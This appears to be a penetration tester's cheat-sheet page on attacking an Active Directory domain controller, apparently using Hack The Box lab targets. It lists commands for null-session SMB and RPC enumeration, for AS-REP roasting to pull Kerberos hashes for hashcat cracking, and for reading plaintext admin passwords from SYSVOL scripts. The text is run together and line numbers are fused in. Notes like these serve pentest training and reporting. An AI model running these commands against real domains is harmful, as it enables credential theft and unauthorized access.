Initial Attack Strategy Misc
Pull a lot of information out of the Domain Controller using enum4linux
Misc
Enum4linux
Pull a lot of information out of the Domain Controller using enum4linux
$enum4linux 10.10.10.161Password Policy enumeration
$crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol{% hint style="info" %} Put in the report that null authentication allows for domain enumeration {% endhint %}
RPCClient
$rpcclient -U '' -N 10.10.10.161$enumdomusers$queryusergroups [rid]$queryuser [rid]$querygroup [rid]GetNPUsers
Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking
$impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat$hashcat --example-hashes | grep -i krb$hashcat --example-hashes | lessCredentials inside SYSVOL
Credentials may be stored inside of a script in the SYSVOL of the domain controller. Can happen on old AD environments.
Anyone with domain credentials can access the SYSVOL. To assign default local admin credentials LAPS is now used instead of scripts via Group Policy
01dir \\conda.local\SYSVOL\conda.localExample path: \\conda.local\SYSVOL\conda.local\Policies{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
01C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps102type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps103$computer=$env:computername04$user = "Administrator"05$Password = "DefaultAdminPass1!"06$user = [adsi]"WinNT://$computer/$user,user"07$user.SetPassword($Password)08net user administrator /active:yesSMB and RPC Null Authentication
01smbclient -L \\\\10.10.10.100\\ -U '' -N01rpcclient -U '' -N 10.10.10.169 Notes
{% hint style="info" %} If the SID of a group is more than 500 or above 1000 then it is not a default Windows group and was created {% endhint %}